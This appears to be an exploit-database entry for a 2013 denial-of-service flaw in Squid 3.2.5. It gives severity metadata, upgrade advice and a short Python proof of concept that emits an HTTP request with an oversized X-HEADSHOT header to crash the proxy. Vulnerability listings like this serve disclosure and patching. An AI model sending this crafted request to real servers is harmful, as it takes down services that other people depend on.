header-logo
Suggest Exploit
vendor:
Squid
by:
SecurityFocus
7,5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: Squid
Affected Version From: 3.2.5
Affected Version To: 3.2.5
Patch Exists: YES
Related CWE: N/A
CPE: a:squid-cache:squid
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2013

Squid Remote Denial-of-Service Vulnerability

Squid is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions. An attacker can send a specially crafted HTTP request with a large number of X-HEADSHOT headers to crash the application.

Mitigation:

Upgrade to the latest version of Squid.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/58319/info

Squid is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.

Squid 3.2.5 is vulnerable; other versions may also be affected. 

Request
  -- cut --
  #!/usr/bin/env python
  print 'GET /index.html HTTP/1.1'
  print 'Host: localhost'
  print 'X-HEADSHOT: ' + '%XX' * 19000
  print '\r\n\r\n'
  -- cut --

  Response
  -- cut --
  HTTP/1.1 200 OK
  Vary: X-HEADSHOT
  -- cut --

Navigation

Suggest Exploit

Services By CQR